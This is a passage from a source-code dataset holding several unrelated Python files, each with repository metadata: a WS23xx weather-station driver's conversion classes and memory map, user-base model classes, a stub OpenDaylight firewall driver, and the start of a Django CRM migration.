def __init__(self, units, nybble_count, scale, description, offset=0):
Conversion.__init__(self, units, nybble_count, description)
self.offset = offset
self.scale = scale
self.units = units
def binary2value(self, data):
num = bcd2num(data) % 10**self.nybble_count + self.offset
return float(num) / 10**self.scale
def value2binary(self, value):
return num2bcd(int(value * 10**self.scale) - self.offset, self.nybble_count)
def str(self, value):
return "%.*f" % (self.scale, value)
def parse(self, s):
return float(s)
#
# For pressures. Add a garbage check.
#
class PressureConversion(BcdConversion):
def __init__(self):
BcdConversion.__init__(self, "hPa", 5, 1, "pressure")
def garbage(self, data):
value = self.binary2value(data)
return value < 900 or value > 1200
#
# For values the represent a date.
#
class ConversionDate(Conversion):
format = None
def __init__(self, nybble_count, format_):
description = format_
for xlate in "%Y:yyyy,%m:mm,%d:dd,%H:hh,%M:mm,%S:ss".split(","):
description = description.replace(*xlate.split(":"))
Conversion.__init__(self, "", nybble_count, description)
self.format = format_
def str(self, value):
return time.strftime(self.format, time.localtime(value))
def parse(self, s):
return time.mktime(time.strptime(s, self.format))
class DateConversion(ConversionDate):
def __init__(self):
ConversionDate.__init__(self, 6, "%Y-%m-%d")
def binary2value(self, data):
x = bcd2num(data)
return time.mktime((
x // 10000 % 100,
x // 100 % 100,
x % 100,
0,
0,
0,
0,
0,
0))
def value2binary(self, value):
tm = time.localtime(value)
dt = tm[2] + tm[1] * 100 + (tm[0]-2000) * 10000
return num2bcd(dt, self.nybble_count)
class DatetimeConversion(ConversionDate):
def __init__(self):
ConversionDate.__init__(self, 11, "%Y-%m-%d %H:%M")
def binary2value(self, data):
x = bcd2num(data)
return time.mktime((
x // 1000000000 % 100 + 2000,
x // 10000000 % 100,
x // 100000 % 100,
x // 100 % 100,
x % 100,
0,
0,
0,
0))
def value2binary(self, value):
tm = time.localtime(value)
dow = tm[6] + 1
dt = tm[4]+(tm[3]+(dow+(tm[2]+(tm[1]+(tm[0]-2000)*100)*100)*10)*100)*100
return num2bcd(dt, self.nybble_count)
class UnixtimeConversion(ConversionDate):
def __init__(self):
ConversionDate.__init__(self, 12, "%Y-%m-%d %H:%M:%S")
def binary2value(self, data):
x = bcd2num(data)
return time.mktime((
x //10000000000 % 100 + 2000,
x // 100000000 % 100,
x // 1000000 % 100,
x // 10000 % 100,
x // 100 % 100,
x % 100,
0,
0,
0))
def value2binary(self, value):
tm = time.localtime(value)
dt = tm[5]+(tm[4]+(tm[3]+(tm[2]+(tm[1]+(tm[0]-2000)*100)*100)*100)*100)*100
return num2bcd(dt, self.nybble_count)
class TimestampConversion(ConversionDate):
def __init__(self):
ConversionDate.__init__(self, 10, "%Y-%m-%d %H:%M")
def binary2value(self, data):
x = bcd2num(data)
return time.mktime((
x // 100000000 % 100 + 2000,
x // 1000000 % 100,
x // 10000 % 100,
x // 100 % 100,
x % 100,
0,
0,
0,
0))
def value2binary(self, value):
tm = time.localtime(value)
dt = tm[4] + (tm[3] + (tm[2] + (tm[1] + (tm[0]-2000)*100)*100)*100)*100
return num2bcd(dt, self.nybble_count)
class TimeConversion(ConversionDate):
def __init__(self):
ConversionDate.__init__(self, 6, "%H:%M:%S")
def binary2value(self, data):
x = bcd2num(data)
return time.mktime((
0,
0,
0,
x // 10000 % 100,
x // 100 % 100,
x % 100,
0,
0,
0)) - time.timezone
def value2binary(self, value):
tm = time.localtime(value)
dt = tm[5] + tm[4]*100 + tm[3]*10000
return num2bcd(dt, self.nybble_count)
def parse(self, s):
return time.mktime((0,0,0) + time.strptime(s, self.format)[3:]) + time.timezone
class WindDirectionConversion(Conversion):
def __init__(self):
Conversion.__init__(self, "deg", 1, "North=0 clockwise")
def binary2value(self, data):
return data[0] * 22.5
def value2binary(self, value):
return (int((value + 11.25) / 22.5),)
def str(self, value):
return "%g" % value
def parse(self, s):
return float(s)
class WindVelocityConversion(Conversion):
def __init__(self):
Conversion.__init__(self, "ms,d", 4, "wind speed and direction")
def binary2value(self, data):
return (bin2num(data[:3])/10.0, bin2num(data[3:4]) * 22.5)
def value2binary(self, value):
return num2bin(value[0]*10, 3) + num2bin((value[1] + 11.5) / 22.5, 1)
def str(self, value):
return "%.1f,%g" % value
def parse(self, s):
return tuple([float(x) for x in s.split(",")])
# The ws2300 1.8 implementation does not calculate wind speed correctly -
# it uses bcd2num instead of bin2num. This conversion object uses bin2num
# decoding and it reads all wind data in a single transcation so that we do
# not suffer coherency problems.
class WindConversion(Conversion):
def __init__(self):
Conversion.__init__(self, "ms,d,o,v", 12, "wind speed, dir, validity")
def binary2value(self, data):
overflow = data[0]
validity = data[1]
speed = bin2num(data[2:5]) / 10.0
direction = data[5] * 22.5
return (speed, direction, overflow, validity)
def str(self, value):
return "%.1f,%g,%s,%s" % value
def parse(self, s):
return tuple([float(x) for x in s.split(",")])
#
# For non-numerical values.
#
class TextConversion(Conversion):
constants = None
def __init__(self, constants):
items = constants.items()[:]
items.sort()
fullname = ",".join([c[1]+"="+str(c[0]) for c in items]) + ",unknown-X"
Conversion.__init__(self, "", 1, fullname)
self.constants = constants
def binary2value(self, data):
return data[0]
def value2binary(self, value):
return (value,)
def str(self, value):
result = self.constants.get(value, None)
if result != None:
return result
return "unknown-%d" % value
def parse(self, s):
result = [c[0] for c in self.constants.items() if c[1] == s]
if result:
return result[0]
return None
#
# For values that are represented by one bit.
#
class ConversionBit(Conversion):
bit = None
desc = None
def __init__(self, bit, desc):
self.bit = bit
self.desc = desc
Conversion.__init__(self, "", 1, desc[0] + "=0," + desc[1] + "=1")
def binary2value(self, data):
return data[0] & (1 << self.bit) and 1 or 0
def value2binary(self, value):
return (value << self.bit,)
def str(self, value):
return self.desc[value]
def parse(self, s):
return [c[0] for c in self.desc.items() if c[1] == s][0]
class BitConversion(ConversionBit):
def __init__(self, bit, desc):
ConversionBit.__init__(self, bit, desc)
#
# Since Ws2300.write_safe() only writes nybbles and we have just one bit,
# we have to insert that bit into the data_read so it can be written as
# a nybble.
#
def write(self, data, nybble):
data = (nybble & ~(1 << self.bit) | data[0],)
return (data, data)
class AlarmSetConversion(BitConversion):
bit = None
desc = None
def __init__(self, bit):
BitConversion.__init__(self, bit, {0:"off", 1:"on"})
class AlarmActiveConversion(BitConversion):
bit = None
desc = None
def __init__(self, bit):
BitConversion.__init__(self, bit, {0:"inactive", 1:"active"})
#
# For values that are represented by one bit, and must be written as
# a single bit.
#
class SetresetConversion(ConversionBit):
bit = None
def __init__(self, bit, desc):
ConversionBit.__init__(self, bit, desc)
#
# Setreset bits use a special write mode.
#
def write(self, data, nybble):
if data[0] == 0:
operation = Ws2300.UNSETBIT
else:
operation = Ws2300.SETBIT
return ((nybble & ~(1 << self.bit) | data[0],), [self.bit], operation)
#
# Conversion for history. This kludge makes history fit into the framework
# used for all the other measures.
#
class HistoryConversion(Conversion):
class HistoryRecord(object):
temp_indoor = None
temp_outdoor = None
pressure_absolute = None
humidity_indoor = None
humidity_outdoor = None
rain = None
wind_speed = None
wind_direction = None
def __str__(self):
return "%4.1fc %2d%% %4.1fc %2d%% %6.1fhPa %6.1fmm %2dm/s %5g" % (
self.temp_indoor, self.humidity_indoor,
self.temp_outdoor, self.humidity_outdoor,
self.pressure_absolute, self.rain,
self.wind_speed, self.wind_direction)
def parse(cls, s):
rec = cls()
toks = [tok.rstrip(string.ascii_letters + "%/") for tok in s.split()]
rec.temp_indoor = float(toks[0])
rec.humidity_indoor = int(toks[1])
rec.temp_outdoor = float(toks[2])
rec.humidity_outdoor = int(toks[3])
rec.pressure_absolute = float(toks[4])
rec.rain = float(toks[5])
rec.wind_speed = int(toks[6])
rec.wind_direction = int((float(toks[7]) + 11.25) / 22.5) % 16
return rec
parse = classmethod(parse)
def __init__(self):
Conversion.__init__(self, "", 19, "history")
def binary2value(self, data):
value = self.__class__.HistoryRecord()
n = bin2num(data[0:5])
value.temp_indoor = (n % 1000) / 10.0 - 30
value.temp_outdoor = (n - (n % 1000)) / 10000.0 - 30
n = bin2num(data[5:10])
value.pressure_absolute = (n % 10000) / 10.0
if value.pressure_absolute < 500:
value.pressure_absolute += 1000
value.humidity_indoor = (n - (n % 10000)) / 10000.0
value.humidity_outdoor = bcd2num(data[10:12])
value.rain = bin2num(data[12:15]) * 0.518
value.wind_speed = bin2num(data[15:18])
value.wind_direction = bin2num(data[18:19]) * 22.5
return value
def value2binary(self, value):
result = ()
n = int((value.temp_indoor + 30) * 10.0 + (value.temp_outdoor + 30) * 10000.0 + 0.5)
result = result + num2bin(n, 5)
n = value.pressure_absolute % 1000
n = int(n * 10.0 + value.humidity_indoor * 10000.0 + 0.5)
result = result + num2bin(n, 5)
result = result + num2bcd(value.humidity_outdoor, 2)
result = result + num2bin(int((value.rain + 0.518/2) / 0.518), 3)
result = result + num2bin(value.wind_speed, 3)
result = result + num2bin(value.wind_direction, 1)
return result
#
# Print value.
#
def str(self, value):
return str(value)
#
# Convert the string produced by "str()" back to the value.
#
def parse(self, s):
return self.__class__.HistoryRecord.parse(s)
#
# Various conversions we know about.
#
conv_ala0 = AlarmActiveConversion(0)
conv_ala1 = AlarmActiveConversion(1)
conv_ala2 = AlarmActiveConversion(2)
conv_ala3 = AlarmActiveConversion(3)
conv_als0 = AlarmSetConversion(0)
conv_als1 = AlarmSetConversion(1)
conv_als2 = AlarmSetConversion(2)
conv_als3 = AlarmSetConversion(3)
conv_buzz = SetresetConversion(3, {0:'on', 1:'off'})
conv_lbck = SetresetConversion(0, {0:'off', 1:'on'})
conv_date = DateConversion()
conv_dtme = DatetimeConversion()
conv_utme = UnixtimeConversion()
conv_hist = HistoryConversion()
conv_stmp = TimestampConversion()
conv_time = TimeConversion()
conv_wdir = WindDirectionConversion()
conv_wvel = WindVelocityConversion()
conv_conn = TextConversion({0:"cable", 3:"lost", 15:"wireless"})
conv_fore = TextConversion({0:"rainy", 1:"cloudy", 2:"sunny"})
conv_spdu = TextConversion({0:"m/s", 1:"knots", 2:"beaufort", 3:"km/h", 4:"mph"})
conv_tend = TextConversion({0:"steady", 1:"rising", 2:"falling"})
conv_wovr = TextConversion({0:"no", 1:"overflow"})
conv_wvld = TextConversion({0:"ok", 1:"invalid", 2:"overflow"})
conv_lcon = BinConversion("", 1, 0, "contrast")
conv_rec2 = BinConversion("", 2, 0, "record number")
conv_humi = BcdConversion("%", 2, 0, "humidity")
conv_pres = PressureConversion()
conv_rain = BcdConversion("mm", 6, 2, "rain")
conv_temp = BcdConversion("C", 4, 2, "temperature", -3000)
conv_per2 = BinConversion("s", 2, 1, "time interval", 5)
conv_per3 = BinConversion("min", 3, 0, "time interval")
conv_wspd = BinConversion("m/s", 3, 1, "speed")
conv_wind = WindConversion()
#
# Define a measurement on the Ws2300. This encapsulates:
# - The names (abbrev and long) of the thing being measured, eg wind speed.
# - The location it can be found at in the Ws2300's memory map.
# - The Conversion used to represent the figure.
#
class Measure(object):
IDS = {} # map, Measures defined. {id: Measure, ...}
NAMES = {} # map, Measures defined. {name: Measure, ...}
address = None # int, Nybble address in the Ws2300
conv = None # object, Type of value
id = None # string, Short name
name = None # string, Long name
reset = None # string, Id of measure used to reset this one
def __init__(self, address, id_, conv, name, reset=None):
self.address = address
self.conv = conv
self.reset = reset
if id_ != None:
self.id = id_
assert not id_ in self.__class__.IDS
self.__class__.IDS[id_] = self
if name != None:
self.name = name
assert not name in self.__class__.NAMES
self.__class__.NAMES[name] = self
def __hash__(self):
return hash(self.id)
def __cmp__(self, other):
if isinstance(other, Measure):
return cmp(self.id, other.id)
return cmp(type(self), type(other))
#
# Conversion for raw Hex data. These are created as needed.
#
class HexConversion(Conversion):
def __init__(self, nybble_count):
Conversion.__init__(self, "", nybble_count, "hex data")
def binary2value(self, data):
return data
def value2binary(self, value):
return value
def str(self, value):
return ",".join(["%x" % nybble for nybble in value])
def parse(self, s):
toks = s.replace(","," ").split()
for i in range(len(toks)):
s = list(toks[i])
s.reverse()
toks[i] = ''.join(s)
list_str = list(''.join(toks))
self.nybble_count = len(list_str)
return tuple([int(nybble) for nybble in list_str])
#
# The raw nybble measure.
#
class HexMeasure(Measure):
def __init__(self, address, id_, conv, name):
self.address = address
self.name = name
self.conv = conv
#
# A History record. Again a kludge to make history fit into the framework
# developed for the other measurements. History records are identified
# by their record number. Record number 0 is the most recently written
# record, record number 1 is the next most recently written and so on.
#
class HistoryMeasure(Measure):
HISTORY_BUFFER_ADDR = 0x6c6 # int, Address of the first history record
MAX_HISTORY_RECORDS = 0xaf # string, Max number of history records stored
LAST_POINTER = None # int, Pointer to last record
RECORD_COUNT = None # int, Number of records in use
recno = None # int, The record number this represents
conv = conv_hist
def __init__(self, recno):
self.recno = recno
def set_constants(cls, ws2300):
measures = [Measure.IDS["hp"], Measure.IDS["hn"]]
data = read_measurements(ws2300, measures)
cls.LAST_POINTER = int(measures[0].conv.binary2value(data[0]))
cls.RECORD_COUNT = int(measures[1].conv.binary2value(data[1]))
set_constants = classmethod(set_constants)
def id(self):
return "h%03d" % self.recno
id = property(id)
def name(self):
return "history record %d" % self.recno
name = property(name)
def offset(self):
if self.LAST_POINTER is None:
raise StandardError("HistoryMeasure.set_constants hasn't been called")
return (self.LAST_POINTER - self.recno) % self.MAX_HISTORY_RECORDS
offset = property(offset)
def address(self):
return self.HISTORY_BUFFER_ADDR + self.conv.nybble_count * self.offset
address = property(address)
#
# The measurements we know about. This is all of them documented in
# memory_map_2300.txt, bar the history. History is handled specially.
# And of course, the "c?"'s aren't real measures at all - its the current
# time on this machine.
#
Measure( -18, "ct", conv_time, "this computer's time")
Measure( -12, "cw", conv_utme, "this computer's date time")
Measure( -6, "cd", conv_date, "this computer's date")
Measure(0x006, "bz", conv_buzz, "buzzer")
Measure(0x00f, "wsu", conv_spdu, "wind speed units")
Measure(0x016, "lb", conv_lbck, "lcd backlight")
Measure(0x019, "sss", conv_als2, "storm warn alarm set")
Measure(0x019, "sts", conv_als0, "station time alarm set")
Measure(0x01a, "phs", conv_als3, "pressure max alarm set")
Measure(0x01a, "pls", conv_als2, "pressure min alarm set")
Measure(0x01b, "oths", conv_als3, "out temp max alarm set")
Measure(0x01b, "otls", conv_als2, "out temp min alarm set")
Measure(0x01b, "iths", conv_als1, "in temp max alarm set")
Measure(0x01b, "itls", conv_als0, "in temp min alarm set")
Measure(0x01c, "dphs", conv_als3, "dew point max alarm set")
Measure(0x01c, "dpls", conv_als2, "dew point min alarm set")
Measure(0x01c, "wchs", conv_als1, "wind chill max alarm set")
Measure(0x01c, "wcls", conv_als0, "wind chill min alarm set")
Measure(0x01d, "ihhs", conv_als3, "in humidity max alarm set")
Measure(0x01d, "ihls", conv_als2, "in humidity min alarm set")
Measure(0x01d, "ohhs", conv_als1, "out humidity max alarm set")
Measure(0x01d, "ohls", conv_als0, "out humidity min alarm set")
Measure(0x01e, "rhhs", conv_als1, "rain 1h alarm set")
Measure(0x01e, "rdhs", conv_als0, "rain 24h alarm set")
Measure(0x01f, "wds", conv_als2, "wind direction alarm set")
Measure(0x01f, "wshs", conv_als1, "wind speed max alarm set")
Measure(0x01f, "wsls", conv_als0, "wind speed min alarm set")
Measure(0x020, "siv", conv_ala2, "icon alarm active")
Measure(0x020, "stv", conv_ala0, "station time alarm active")
Measure(0x021, "phv", conv_ala3, "pressure max alarm active")
Measure(0x021, "plv", conv_ala2, "pressure min alarm active")
Measure(0x022, "othv", conv_ala3, "out temp max alarm active")
Measure(0x022, "otlv", conv_ala2, "out temp min alarm active")
Measure(0x022, "ithv", conv_ala1, "in temp max alarm active")
Measure(0x022, "itlv", conv_ala0, "in temp min alarm active")
Measure(0x023, "dphv", conv_ala3, "dew point max alarm active")
Measure(0x023, "dplv", conv_ala2, "dew point min alarm active")
Measure(0x023, "wchv", conv_ala1, "wind chill max alarm active")
Measure(0x023, "wclv", conv_ala0, "wind chill min alarm active")
Measure(0x024, "ihhv", conv_ala3, "in humidity max alarm active")
Measure(0x024, "ihlv", conv_ala2, "in humidity min alarm active")
Measure(0x024, "ohhv", conv_ala1, "out humidity max alarm active")
Measure(0x024, "ohlv", conv_ala0, "out humidity min alarm active")
Measure(0x025, "rhhv", conv_ala1, "rain 1h alarm active")
Measure(0x025, "rdhv", conv_ala0, "rain 24h alarm active")
Measure(0x026, "wdv", conv_ala2, "wind direction alarm active")
Measure(0x026, "wshv", conv_ala1, "wind speed max alarm active")
Measure(0x026, "wslv", conv_ala0, "wind speed min alarm active")
Measure(0x027, None, conv_ala3, "pressure max alarm active alias")
Measure(0x027, None, conv_ala2, "pressure min alarm active alias")
Measure(0x028, None, conv_ala3, "out temp max alarm active alias")
Measure(0x028, None, conv_ala2, "out temp min alarm active alias")
Measure(0x028, None, conv_ala1, "in temp max alarm active alias")
Measure(0x028, None, conv_ala0, "in temp min alarm active alias")
Measure(0x029, None, conv_ala3, "dew point max alarm active alias")
Measure(0x029, None, conv_ala2, "dew point min alarm active alias")
Measure(0x029, None, conv_ala1, "wind chill max alarm active alias")
Measure(0x029, None, conv_ala0, "wind chill min alarm active alias")
Measure(0x02a, None, conv_ala3, "in humidity max alarm active alias")
Measure(0x02a, None, conv_ala2, "in humidity min alarm active alias")
Measure(0x02a, None, conv_ala1, "out humidity max alarm active alias")
Measure(0x02a, None, conv_ala0, "out humidity min alarm active alias")
Measure(0x02b, None, conv_ala1, "rain 1h alarm active alias")
Measure(0x02b, None, conv_ala0, "rain 24h alarm active alias")
Measure(0x02c, None, conv_ala2, "wind direction alarm active alias")
Measure(0x02c, None, conv_ala2, "wind speed max alarm active alias")
Measure(0x02c, None, conv_ala2, "wind speed min alarm active alias")
Measure(0x200, "st", conv_time, "station set time", reset="ct")
Measure(0x23b, "sw", conv_dtme, "station current date time")
Measure(0x24d, "sd", conv_date, "station set date", reset="cd")
Measure(0x266, "lc", conv_lcon, "lcd contrast (ro)")
Measure(0x26b, "for", conv_fore, "forecast")
Measure(0x26c, "ten", conv_tend, "tendency")
Measure(0x346, "it", conv_temp, "in temp")
Measure(0x34b, "itl", conv_temp, "in temp min", reset="it")
Measure(0x350, "ith", conv_temp, "in temp max", reset="it")
Measure(0x354, "itlw", conv_stmp, "in temp min when", reset="sw")
Measure(0x35e, "ithw", conv_stmp, "in temp max when", reset="sw")
Measure(0x369, "itla", conv_temp, "in temp min alarm")
Measure(0x36e, "itha", conv_temp, "in temp max alarm")
Measure(0x373, "ot", conv_temp, "out temp")
Measure(0x378, "otl", conv_temp, "out temp min", reset="ot")
Measure(0x37d, "oth", conv_temp, "out temp max", reset="ot")
Measure(0x381, "otlw", conv_stmp, "out temp min when", reset="sw")
Measure(0x38b, "othw", conv_stmp, "out temp max when", reset="sw")
Measure(0x396, "otla", conv_temp, "out temp min alarm")
Measure(0x39b, "otha", conv_temp, "out temp max alarm")
Measure(0x3a0, "wc", conv_temp, "wind chill")
Measure(0x3a5, "wcl", conv_temp, "wind chill min", reset="wc")
Measure(0x3aa, "wch", conv_temp, "wind chill max", reset="wc")
Measure(0x3ae, "wclw", conv_stmp, "wind chill min when", reset="sw")
Measure(0x3b8, "wchw", conv_stmp, "wind chill max when", reset="sw")
Measure(0x3c3, "wcla", conv_temp, "wind chill min alarm")
Measure(0x3c8, "wcha", conv_temp, "wind chill max alarm")
Measure(0x3ce, "dp", conv_temp, "dew point")
Measure(0x3d3, "dpl", conv_temp, "dew point min", reset="dp")
Measure(0x3d8, "dph", conv_temp, "dew point max", reset="dp")
Measure(0x3dc, "dplw", conv_stmp, "dew point min when", reset="sw")
Measure(0x3e6, "dphw", conv_stmp, "dew point max when", reset="sw")
Measure(0x3f1, "dpla", conv_temp, "dew point min alarm")
Measure(0x3f6, "dpha", conv_temp, "dew point max alarm")
Measure(0x3fb, "ih", conv_humi, "in humidity")
Measure(0x3fd, "ihl", conv_humi, "in humidity min", reset="ih")
Measure(0x3ff, "ihh", conv_humi, "in humidity max", reset="ih")
Measure(0x401, "ihlw", conv_stmp, "in humidity min when", reset="sw")
Measure(0x40b, "ihhw", conv_stmp, "in humidity max when", reset="sw")
Measure(0x415, "ihla", conv_humi, "in humidity min alarm")
Measure(0x417, "ihha", conv_humi, "in humidity max alarm")
Measure(0x419, "oh", conv_humi, "out humidity")
Measure(0x41b, "ohl", conv_humi, "out humidity min", reset="oh")
Measure(0x41d, "ohh", conv_humi, "out humidity max", reset="oh")
Measure(0x41f, "ohlw", conv_stmp, "out humidity min when", reset="sw")
Measure(0x429, "ohhw", conv_stmp, "out humidity max when", reset="sw")
Measure(0x433, "ohla", conv_humi, "out humidity min alarm")
Measure(0x435, "ohha", conv_humi, "out humidity max alarm")
Measure(0x497, "rd", conv_rain, "rain 24h")
Measure(0x49d, "rdh", conv_rain, "rain 24h max", reset="rd")
Measure(0x4a3, "rdhw", conv_stmp, "rain 24h max when", reset="sw")
Measure(0x4ae, "rdha", conv_rain, "rain 24h max alarm")
Measure(0x4b4, "rh", conv_rain, "rain 1h")
Measure(0x4ba, "rhh", conv_rain, "rain 1h max", reset="rh")
Measure(0x4c0, "rhhw", conv_stmp, "rain 1h max when", reset="sw")
Measure(0x4cb, "rhha", conv_rain, "rain 1h max alarm")
Measure(0x4d2, "rt", conv_rain, "rain total", reset=0)
Measure(0x4d8, "rtrw", conv_stmp, "rain total reset when", reset="sw")
Measure(0x4ee, "wsl", conv_wspd, "wind speed min", reset="ws")
Measure(0x4f4, "wsh", conv_wspd, "wind speed max", reset="ws")
Measure(0x4f8, "wslw", conv_stmp, "wind speed min when", reset="sw")
Measure(0x502, "wshw", conv_stmp, "wind speed max when", reset="sw")
Measure(0x527, "wso", conv_wovr, "wind speed overflow")
Measure(0x528, "wsv", conv_wvld, "wind speed validity")
Measure(0x529, "wv", conv_wvel, "wind velocity")
Measure(0x529, "ws", conv_wspd, "wind speed")
Measure(0x52c, "w0", conv_wdir, "wind direction")
Measure(0x52d, "w1", conv_wdir, "wind direction 1")
Measure(0x52e, "w2", conv_wdir, "wind direction 2")
Measure(0x52f, "w3", conv_wdir, "wind direction 3")
Measure(0x530, "w4", conv_wdir, "wind direction 4")
Measure(0x531, "w5", conv_wdir, "wind direction 5")
Measure(0x533, "wsla", conv_wspd, "wind speed min alarm")
Measure(0x538, "wsha", conv_wspd, "wind speed max alarm")
Measure(0x54d, "cn", conv_conn, "connection type")
Measure(0x54f, "cc", conv_per2, "connection time till connect")
Measure(0x5d8, "pa", conv_pres, "pressure absolute")
Measure(0x5e2, "pr", conv_pres, "pressure relative")
Measure(0x5ec, "pc", conv_pres, "pressure correction")
Measure(0x5f6, "pal", conv_pres, "pressure absolute min", reset="pa")
Measure(0x600, "prl", conv_pres, "pressure relative min", reset="pr")
Measure(0x60a, "pah", conv_pres, "pressure absolute max", reset="pa")
Measure(0x614, "prh", conv_pres, "pressure relative max", reset="pr")
Measure(0x61e, "plw", conv_stmp, "pressure min when", reset="sw")
Measure(0x628, "phw", conv_stmp, "pressure max when", reset="sw")
Measure(0x63c, "pla", conv_pres, "pressure min alarm")
Measure(0x650, "pha", conv_pres, "pressure max alarm")
Measure(0x6b2, "hi", conv_per3, "history interval")
Measure(0x6b5, "hc", conv_per3, "history time till sample")
Measure(0x6b8, "hw", conv_stmp, "history last sample when")
Measure(0x6c2, "hp", conv_rec2, "history last record pointer",reset=0)
Measure(0x6c4, "hn", conv_rec2, "history number of records", reset=0)
# get all of the wind info in a single invocation
Measure(0x527, "wind", conv_wind, "wind")
#
# Read the requests.
#
def read_measurements(ws2300, read_requests):
if not read_requests:
return []
#
# Optimise what we have to read.
#
batches = [(m.address, m.conv.nybble_count) for m in read_requests]
batches.sort()
index = 1
addr = {batches[0][0]: 0}
while index < len(batches):
same_sign = (batches[index-1][0] < 0) == (batches[index][0] < 0)
same_area = batches[index-1][0] + batches[index-1][1] + 6 >= batches[index][0]
if not same_sign or not same_area:
addr[batches[index][0]] = index
index += 1
continue
addr[batches[index][0]] = index-1
batches[index-1] = batches[index-1][0], batches[index][0] + batches[index][1] - batches[index-1][0]
del batches[index]
#
# Read the data.
#
nybbles = ws2300.read_batch(batches)
#
# Return the data read in the order it was requested.
#
results = []
for measure in read_requests:
index = addr[measure.address]
offset = measure.address - batches[index][0]
results.append(nybbles[index][offset:offset+measure.conv.nybble_count])
return results
# define a main entry point for basic testing of the station without weewx
# engine and service overhead. invoke this as follows from the weewx root dir:
#
# PYTHONPATH=bin python bin/weewx/drivers/ws23xx.py
if __name__ == '__main__':
import optparse
usage = """%prog [options] [--help]"""
port = DEFAULT_PORT
parser = optparse.OptionParser(usage=usage)
parser.add_option('--version', dest='version', action='store_true',
help='display driver version')
parser.add_option('--port', dest='port', metavar='PORT',
help='serial port to which the station is connected')
parser.add_option('--readings', dest='readings', action='store_true',
help='display sensor readings')
parser.add_option("--records", dest="records", type=int, metavar="N",
help="display N station records, oldest to newest")
parser.add_option('--help-measures', dest='hm', action='store_true',
help='display measure names')
parser.add_option('--measure', dest='measure', type=str,
metavar="MEASURE", help='display single measure')
(options, args) = parser.parse_args()
if options.version:
print "ws23xx driver version %s" % DRIVER_VERSION
exit(1)
with WS23xx(port) as s:
if options.readings:
data = s.get_raw_data(SENSOR_IDS)
print data
if options.records is not None:
for ts,record in s.gen_records(count=options.records):
print ts,record
if options.measure:
data = s.get_raw_data([options.measure])
print data
if options.hm:
for m in Measure.IDS:
print "%s\t%s" % (m, Measure.IDS[m].name)
|
garretlh/nimbus-drivers
|
src/main/python/nimbusdrivers/ws23xx.py
|
Python
|
gpl-3.0
| 72,031 | 0.004776 |
import datetime
class AuthenticationInfo:
def __init__(self, password, email):
self.Password = password
self.Email = email
class ProfileInfo:
def __init__(self, display_name):
self.DisplayName = display_name
class Token:
def __init__(self, id_token, valid_until):
self.Id = id_token
self.ValidUntil = valid_until
class User:
def __init__(self, id_user, username, display_name, groups):
self.IdUser = id_user
self.Username = username
self.DisplayName = display_name
self.Groups = groups
class Group:
def __init__(self, id_group, name):
self.Id = id_group
self.Name = name
class CreateUserRequest:
def __init__(self, username, authentication, profile):
self.Username = username
self.Authentication = authentication
self.Profile = profile
class ModifyCredentialsRequest:
def __init__(self, username, token, authentication):
self.Username = username
self.Token = token
self.Authentication = authentication
class ModifyProfileRequest:
def __init__(self, username, token, profile):
self.Username = username
self.Token = token
self.Profile = profile
class AddUserToGroupRequest:
def __init__(self, username, token, user_to_add, id_group):
self.Username = username
self.Token = token
self.UserToAdd = user_to_add
self.IdGroup = id_group
class TokenSuccessResponse:
def __init__(self, success, token):
self.Success = success
self.Token = token
@staticmethod
def invalid():
return TokenSuccessResponse(
False,
Token("", datetime.datetime.now()))
class ConnectUserResponse:
def __init__(self, success, token, id_user):
self.Success = success
self.Token = token
self.IdUser = id_user
@staticmethod
def invalid():
return ConnectUserResponse(
False,
Token("", datetime.datetime.now()),
0)
class UserSummaryResponse:
def __init__(self, success, token, display_name, groups):
self.Success = success
self.Token = token
self.DisplayName = display_name
self.Groups = groups
@staticmethod
def invalid():
return UserSummaryResponse(
False,
Token("", datetime.datetime.now()),
"", [])
class UserListResponse:
def __init__(self, success, token, users):
self.Success = success
self.Token = token
self.Users = users
@staticmethod
def invalid():
return UserListResponse(
False,
Token("", datetime.datetime.now()),
[])
|
Com-Ericmas001/py-userbase
|
py_userbase/userbase_models.py
|
Python
|
mit
| 2,746 | 0.00437 |
#
# Copyright (C) 2013 Red Hat, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
#
from oslo_log import log as logging
from neutron_fwaas.services.firewall.drivers import fwaas_base
from networking_odl.common import client as odl_client
from networking_odl.common import config # noqa
LOG = logging.getLogger(__name__)
class OpenDaylightFwaasDriver(fwaas_base.FwaasDriverBase):
"""OpenDaylight FWaaS Driver
This code is the backend implementation for the OpenDaylight FWaaS
driver for Openstack Neutron.
"""
def __init__(self):
LOG.debug("Initializing OpenDaylight FWaaS driver")
self.client = odl_client.OpenDaylightRestClient.create_client()
def create_firewall(self, apply_list, firewall):
"""Create the Firewall with default (drop all) policy.
The default policy will be applied on all the interfaces of
trusted zone.
"""
pass
def delete_firewall(self, apply_list, firewall):
"""Delete firewall.
Removes all policies created by this instance and frees up
all the resources.
"""
pass
def update_firewall(self, apply_list, firewall):
"""Apply the policy on all trusted interfaces.
Remove previous policy and apply the new policy on all trusted
interfaces.
"""
pass
def apply_default_policy(self, apply_list, firewall):
"""Apply the default policy on all trusted interfaces.
Remove current policy and apply the default policy on all trusted
interfaces.
"""
pass
|
flavio-fernandes/networking-odl
|
networking_odl/fwaas/driver.py
|
Python
|
apache-2.0
| 2,105 | 0 |
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
from django.conf import settings
class Migration(migrations.Migration):
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
]
operations = [
migrations.CreateModel(
name='CallLog',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('date', models.DateTimeField(auto_now_add=True)),
('note', models.TextField()),
],
),
migrations.CreateModel(
name='Campaign',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('name', models.CharField(max_length=200)),
('description', models.TextField(null=True, blank=True)),
],
),
migrations.CreateModel(
name='Company',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('name', models.CharField(max_length=200)),
('website', models.URLField(null=True, blank=True)),
('address1', models.CharField(max_length=200, null=True, blank=True)),
('address2', models.CharField(max_length=200, null=True, blank=True)),
('city', models.CharField(max_length=200, null=True, blank=True)),
